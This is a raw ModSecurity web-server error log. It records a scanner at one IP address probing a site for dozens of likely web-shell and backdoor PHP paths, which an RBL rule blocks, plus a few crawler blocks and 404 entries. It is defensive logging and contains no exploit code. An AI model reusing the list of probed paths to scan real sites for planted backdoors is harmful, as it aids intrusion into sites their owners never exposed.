[Tue May 26 13:11:44.053107 2026] [security2:error] [pid 496740:tid 496906] [client 20.151.117.104:12014] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/filemanager.php"] [unique_id "ahVOuOvOeft4ltnLrH4x7AAAACQ"]
[Tue May 26 13:11:44.196128 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:6712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-blog.php"] [unique_id "ahVOuOvOeft4ltnLrH4x7wAAABE"]
[Tue May 26 13:11:44.196219 2026] [security2:error] [pid 496740:tid 496887] [client 20.151.117.104:6712] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-blog.php"] [unique_id "ahVOuOvOeft4ltnLrH4x7wAAABE"]
[Tue May 26 13:11:44.341485 2026] [security2:error] [pid 496740:tid 496982] [client 20.151.117.104:14281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOuOvOeft4ltnLrH4x8wAAAHA"]
[Tue May 26 13:11:44.696853 2026] [security2:error] [pid 496740:tid 496976] [client 20.151.117.104:14281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/xmlrpc.php"] [unique_id "ahVOuOvOeft4ltnLrH4x-gAAAGo"]
[Tue May 26 13:11:44.696981 2026] [security2:error] [pid 496740:tid 496976] [client 20.151.117.104:14281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/xmlrpc.php"] [unique_id "ahVOuOvOeft4ltnLrH4x-gAAAGo"]
[Tue May 26 13:11:44.839779 2026] [security2:error] [pid 496740:tid 496990] [client 20.151.117.104:14298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/cd.php"] [unique_id "ahVOuOvOeft4ltnLrH4yDQAAAHg"]
[Tue May 26 13:11:44.839866 2026] [security2:error] [pid 496740:tid 496990] [client 20.151.117.104:14298] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/cd.php"] [unique_id "ahVOuOvOeft4ltnLrH4yDQAAAHg"]
[Tue May 26 13:11:44.982383 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.117.104:37160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/css.php"] [unique_id "ahVOuOvOeft4ltnLrH4yDwAAAHc"]
[Tue May 26 13:11:44.982478 2026] [security2:error] [pid 496740:tid 496989] [client 20.151.117.104:37160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/css.php"] [unique_id "ahVOuOvOeft4ltnLrH4yDwAAAHc"]
[Tue May 26 13:11:45.132319 2026] [security2:error] [pid 496740:tid 496953] [client 20.151.117.104:49870] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/lu4.php"] [unique_id "ahVOuevOeft4ltnLrH4yFQAAAFM"]
[Tue May 26 13:11:45.132433 2026] [security2:error] [pid 496740:tid 496953] [client 20.151.117.104:49870] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/lu4.php"] [unique_id "ahVOuevOeft4ltnLrH4yFQAAAFM"]
[Tue May 26 13:11:45.280588 2026] [security2:error] [pid 496740:tid 496876] [client 20.151.117.104:40690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVOuevOeft4ltnLrH4yHwAAAAY"]
[Tue May 26 13:11:45.280714 2026] [security2:error] [pid 496740:tid 496876] [client 20.151.117.104:40690] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahVOuevOeft4ltnLrH4yHwAAAAY"]
[Tue May 26 13:11:45.429426 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:14292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVOuevOeft4ltnLrH4yIwAAAGg"]
[Tue May 26 13:11:45.429544 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:14292] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVOuevOeft4ltnLrH4yIwAAAGg"]
[Tue May 26 13:11:45.573752 2026] [security2:error] [pid 496740:tid 496889] [client 20.151.117.104:39984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/upgrade/index.php"] [unique_id "ahVOuevOeft4ltnLrH4yKgAAABM"]
[Tue May 26 13:11:45.573829 2026] [security2:error] [pid 496740:tid 496889] [client 20.151.117.104:39984] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/upgrade/index.php"] [unique_id "ahVOuevOeft4ltnLrH4yKgAAABM"]
[Tue May 26 13:11:45.716400 2026] [security2:error] [pid 496740:tid 496980] [client 20.151.117.104:16133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/.well-known/gecko-litespeed.php"] [unique_id "ahVOuevOeft4ltnLrH4yNAAAAG4"]
[Tue May 26 13:11:45.716490 2026] [security2:error] [pid 496740:tid 496980] [client 20.151.117.104:16133] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/.well-known/gecko-litespeed.php"] [unique_id "ahVOuevOeft4ltnLrH4yNAAAAG4"]
[Tue May 26 13:11:45.859692 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:35544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ant.php"] [unique_id "ahVOuevOeft4ltnLrH4yOAAAAGY"]
[Tue May 26 13:11:45.859812 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:35544] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ant.php"] [unique_id "ahVOuevOeft4ltnLrH4yOAAAAGY"]
[Tue May 26 13:11:46.002860 2026] [security2:error] [pid 496740:tid 496940] [client 20.151.117.104:40640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/autoload_classmap.php"] [unique_id "ahVOuuvOeft4ltnLrH4yQgAAAEY"]
[Tue May 26 13:11:46.002961 2026] [security2:error] [pid 496740:tid 496940] [client 20.151.117.104:40640] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/autoload_classmap.php"] [unique_id "ahVOuuvOeft4ltnLrH4yQgAAAEY"]
[Tue May 26 13:11:46.056576 2026] [security2:error] [pid 496740:tid 496945] [client 95.59.74.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVOuevOeft4ltnLrH4yQQAAAEs"], referer: https://www.anujtradingco.com/
[Tue May 26 13:11:46.146274 2026] [security2:error] [pid 496740:tid 496990] [client 20.151.117.104:59306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/storage/rip.php"] [unique_id "ahVOuuvOeft4ltnLrH4ySAAAAHg"]
[Tue May 26 13:11:46.146375 2026] [security2:error] [pid 496740:tid 496990] [client 20.151.117.104:59306] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/storage/rip.php"] [unique_id "ahVOuuvOeft4ltnLrH4ySAAAAHg"]
[Tue May 26 13:11:46.289344 2026] [security2:error] [pid 496740:tid 496942] [client 20.151.117.104:14278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/tinyfilemanager.php"] [unique_id "ahVOuuvOeft4ltnLrH4yUAAAAEg"]
[Tue May 26 13:11:46.289494 2026] [security2:error] [pid 496740:tid 496942] [client 20.151.117.104:14278] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/tinyfilemanager.php"] [unique_id "ahVOuuvOeft4ltnLrH4yUAAAAEg"]
[Tue May 26 13:11:46.434559 2026] [security2:error] [pid 496740:tid 496876] [client 20.151.117.104:28926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOuuvOeft4ltnLrH4yWwAAAAY"]
[Tue May 26 13:11:46.505793 2026] [security2:error] [pid 496740:tid 496907] [client 20.151.117.104:28926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/403.php"] [unique_id "ahVOuuvOeft4ltnLrH4yXwAAACU"]
[Tue May 26 13:11:46.505930 2026] [security2:error] [pid 496740:tid 496907] [client 20.151.117.104:28926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/403.php"] [unique_id "ahVOuuvOeft4ltnLrH4yXwAAACU"]
[Tue May 26 13:11:46.649245 2026] [security2:error] [pid 496740:tid 496906] [client 20.151.117.104:27926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/av.php"] [unique_id "ahVOuuvOeft4ltnLrH4yYwAAACQ"]
[Tue May 26 13:11:46.649348 2026] [security2:error] [pid 496740:tid 496906] [client 20.151.117.104:27926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/av.php"] [unique_id "ahVOuuvOeft4ltnLrH4yYwAAACQ"]
[Tue May 26 13:11:46.792820 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:44987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/tool.php"] [unique_id "ahVOuuvOeft4ltnLrH4yagAAAFg"]
[Tue May 26 13:11:46.792907 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:44987] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/tool.php"] [unique_id "ahVOuuvOeft4ltnLrH4yagAAAFg"]
[Tue May 26 13:11:46.871031 2026] [security2:error] [pid 496740:tid 496983] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOuuvOeft4ltnLrH4yXgAAAHE"]
[Tue May 26 13:11:46.938895 2026] [security2:error] [pid 496740:tid 496904] [client 20.151.117.104:37171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOuuvOeft4ltnLrH4ydAAAACI"]
[Tue May 26 13:11:47.009796 2026] [security2:error] [pid 496740:tid 496909] [client 20.151.117.104:37171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/index.php"] [unique_id "ahVOu-vOeft4ltnLrH4yeAAAACc"]
[Tue May 26 13:11:47.009915 2026] [security2:error] [pid 496740:tid 496909] [client 20.151.117.104:37171] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/index.php"] [unique_id "ahVOu-vOeft4ltnLrH4yeAAAACc"]
[Tue May 26 13:11:47.098984 2026] [security2:error] [pid 496740:tid 496951] [client 95.59.74.105:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVOu-vOeft4ltnLrH4yewAAAFE"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1235804&moderation-hash=bf60c5ab18f94c5d9b25d70963a67bf6
[Tue May 26 13:11:47.152073 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:39971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVOu-vOeft4ltnLrH4yggAAAG8"]
[Tue May 26 13:11:47.152220 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:39971] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/core-plugin/include.php"] [unique_id "ahVOu-vOeft4ltnLrH4yggAAAG8"]
[Tue May 26 13:11:47.294473 2026] [security2:error] [pid 496740:tid 496994] [client 20.151.117.104:6671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/pridmag/b.php"] [unique_id "ahVOu-vOeft4ltnLrH4yhgAAAHw"]
[Tue May 26 13:11:47.294577 2026] [security2:error] [pid 496740:tid 496994] [client 20.151.117.104:6671] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/pridmag/b.php"] [unique_id "ahVOu-vOeft4ltnLrH4yhgAAAHw"]
[Tue May 26 13:11:47.311191 2026] [security2:error] [pid 496740:tid 496912] [client 216.244.66.241:46584] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/astirafdb/adcdfd2576701.shtml"] [unique_id "ahVOu-vOeft4ltnLrH4yhwAAACo"]
[Tue May 26 13:11:47.311310 2026] [security2:error] [pid 496740:tid 496912] [client 216.244.66.241:46584] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/astirafdb/adcdfd2576701.shtml"] [unique_id "ahVOu-vOeft4ltnLrH4yhwAAACo"]
[Tue May 26 13:11:47.439365 2026] [security2:error] [pid 496740:tid 496943] [client 20.151.117.104:30142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOu-vOeft4ltnLrH4yiwAAAEk"]
[Tue May 26 13:11:47.510304 2026] [security2:error] [pid 496740:tid 496903] [client 20.151.117.104:30142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-trackback.php"] [unique_id "ahVOu-vOeft4ltnLrH4ykQAAACE"]
[Tue May 26 13:11:47.510388 2026] [security2:error] [pid 496740:tid 496903] [client 20.151.117.104:30142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-trackback.php"] [unique_id "ahVOu-vOeft4ltnLrH4ykQAAACE"]
[Tue May 26 13:11:47.654096 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:27912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws.php"] [unique_id "ahVOu-vOeft4ltnLrH4ykwAAADg"]
[Tue May 26 13:11:47.654215 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:27912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws.php"] [unique_id "ahVOu-vOeft4ltnLrH4ykwAAADg"]
[Tue May 26 13:11:47.797452 2026] [security2:error] [pid 496740:tid 496895] [client 20.151.117.104:14285] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOu-vOeft4ltnLrH4yoAAAABk"]
[Tue May 26 13:11:47.868326 2026] [security2:error] [pid 496740:tid 496921] [client 20.151.117.104:14285] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/0.php"] [unique_id "ahVOu-vOeft4ltnLrH4yoQAAADM"]
[Tue May 26 13:11:47.868441 2026] [security2:error] [pid 496740:tid 496921] [client 20.151.117.104:14285] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/0.php"] [unique_id "ahVOu-vOeft4ltnLrH4yoQAAADM"]
[Tue May 26 13:11:48.011667 2026] [security2:error] [pid 496740:tid 496947] [client 20.151.117.104:30101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/1index.php"] [unique_id "ahVOvOvOeft4ltnLrH4ypQAAAE0"]
[Tue May 26 13:11:48.011764 2026] [security2:error] [pid 496740:tid 496947] [client 20.151.117.104:30101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/1index.php"] [unique_id "ahVOvOvOeft4ltnLrH4ypQAAAE0"]
[Tue May 26 13:11:48.155384 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:27658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/autoload_classmap/function.php"] [unique_id "ahVOvOvOeft4ltnLrH4yqgAAAGQ"]
[Tue May 26 13:11:48.155492 2026] [security2:error] [pid 496740:tid 496970] [client 20.151.117.104:27658] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/autoload_classmap/function.php"] [unique_id "ahVOvOvOeft4ltnLrH4yqgAAAGQ"]
[Tue May 26 13:11:48.298308 2026] [security2:error] [pid 496740:tid 496885] [client 20.151.117.104:11978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/dvve.php"] [unique_id "ahVOvOvOeft4ltnLrH4ytgAAAA8"]
[Tue May 26 13:11:48.298404 2026] [security2:error] [pid 496740:tid 496885] [client 20.151.117.104:11978] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/dvve.php"] [unique_id "ahVOvOvOeft4ltnLrH4ytgAAAA8"]
[Tue May 26 13:11:48.445952 2026] [security2:error] [pid 496740:tid 496930] [client 20.151.117.104:27925] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOvOvOeft4ltnLrH4yxQAAADw"]
